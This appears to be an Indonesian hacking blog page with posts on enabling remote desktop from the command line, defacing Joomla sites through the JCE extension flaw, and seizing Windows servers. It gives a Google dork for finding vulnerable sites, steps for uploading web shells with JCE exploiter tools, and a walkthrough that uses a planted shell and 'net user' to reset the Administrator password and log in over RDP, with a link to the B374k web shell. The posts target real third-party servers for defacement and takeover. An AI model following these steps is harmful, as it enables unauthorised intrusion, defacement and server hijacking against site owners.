emm tadi sempet browsing nemu blog ini http://www.windows-commandline.com/enable-remote-desktop-command-line/ mayan lah buat bypass remote yang server nya nggk bisa di remote xixix
langsung aja mas e... sorry nggk bisa tambah gambar soalnya koneksi aku lagi kacaw
Langsung Pake Command di bawah ini:)) 
 untuk menonaktifkan nya
 untuk mengaktifkan Remote assistance
Biarpun hasil copas moga aja berguna hehehe mau bertanya ? comment aja mas bero

Exploit Lama Joomla JCE Ext

Setelah lama saya tidak posting deface, kali ini saya akan share trik deface yang akhir - akhir ini menjadi trik yang sering digunakan para defacer, simak seperti apa trik ini.

Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi .php
JCE Exploiter Versi .exe
  1. Download JCE Exploiternya disini
  2. Selesai download, anda cari target yang vuln menggunakan dork :
    inurl:index.php?option=com_jce
  3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak dengan mencopy url webnya, yaitu : www.site.com
  4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe


    5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini


    6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell anda


7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

JCE Exploiter Versi .php

1. Download scriptnya disini

2. Selesai download, jangan dilupa diekstrak terlebih dahulu

3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya, atau anda bisa gunakan punya saya disini


4. Kemudian anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
- Kolom selanjutnya kosongi saja

6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah akan muncul tulisan seperti ini


7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul. Silahkan deh dieksekusi.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

SUMBER : http://ramadhanlmzero.blogspot.com/2013/07/cara-deface-web-dengan-exploit-jce.html

Mengambil hak akses windows server ( MALING )

hem hari hari ini panas sekali di tempat ku... server game ku udah aman tinggal update post di blog.. hehehe langsung aja ya teknik ini khusus windows server looh hehehhehe yuk kita langsung aja :) mas bero !ini simple kok gans heheheh langsung aja ya... pertama kita harus sudah punya target yang sudah di tanem shell xixixi inget WINDOWS SERVER ITU MEMILIKI WEBSERVER SENDIRI YAITU IIS SERVER !  tapi kalau iis server nggk di install mungkin dia pake apache atau litespeed dan semacamnya

Target Pertama Ku

Langsung Aja Kita Masuk Ke Shell Yang Sudah Aku Tanam :)
http://i.imgur.com/hvfpvUU.png

Setelah Kita Masuk Langsung Aja Check OS Server Nya :))
http://img690.imageshack.us/img690/9812/idgs.png 

Nah Setelah Itu Langsung Shell Command Check IP :)
http://i.imgur.com/zkqLdsx.png 

Kita Langsung Check Menggunakan RDP :))
http://i.imgur.com/c0e8sL4.png

Test Masukin IP nya :))
http://i.imgur.com/UkdY1xL.png 

Kalau Seperti Begini Berati Masuk :))
http://img853.imageshack.us/img853/9398/6c7z.png

nah Setelah itu Kita Check User Nya Aja Liat Di Gambar Berikut :))
Dengan Command net user 
http://img812.imageshack.us/img812/2756/55y1.png 

Nah Sekarang Langsung Ganti Pass Administrator Nya :))
Dengan Command  : 
net user namauser passwordbaru 
Contoh :
net user Administrador *di sembunyikan*
http://i.imgur.com/vV7kM6e.png 
 Berhasil ! Karna Server Ini memakai Bahasa Spanyol Mungkin hehehe
*Se ha completado el comando correctamente.
yang Artinya 
*Dia telah menyelesaikan perintah berhasil.( indo )
*He has completed the command successfully. ( ing )

Sesudah Di ganti pass nya langsung aja connect *_*
http://i.imgur.com/jcTIaTo.png  

jika menemukan informasi sertifikat ! klik ok aja say 
 

Setelah Di Klik Ok Tunggu Loading Connect nya 
http://img51.imageshack.us/img51/5656/j2l7.png 

Berhasil Ciat Ciat !
 http://i.imgur.com/dsGhskN.png 

SELAMAT ANDA MENJADI TELAH MENJADI MALING ! ATAU BISA DI SEBUT JUGA BAJINGAN hehhehe
 
udah dulu ah capek ngetik 
tunggu update lain selanjut nya :) target sih update cara teknik rooting dan mengambil hak akses linux server tapi nanti :))

Download Shell B374k : http://code.google.com/p/b374k-shell/
Diberdayakan oleh Blogger.

 

© 2013 I'Learning. All rights resevered. Designed by Templateism

Back To Top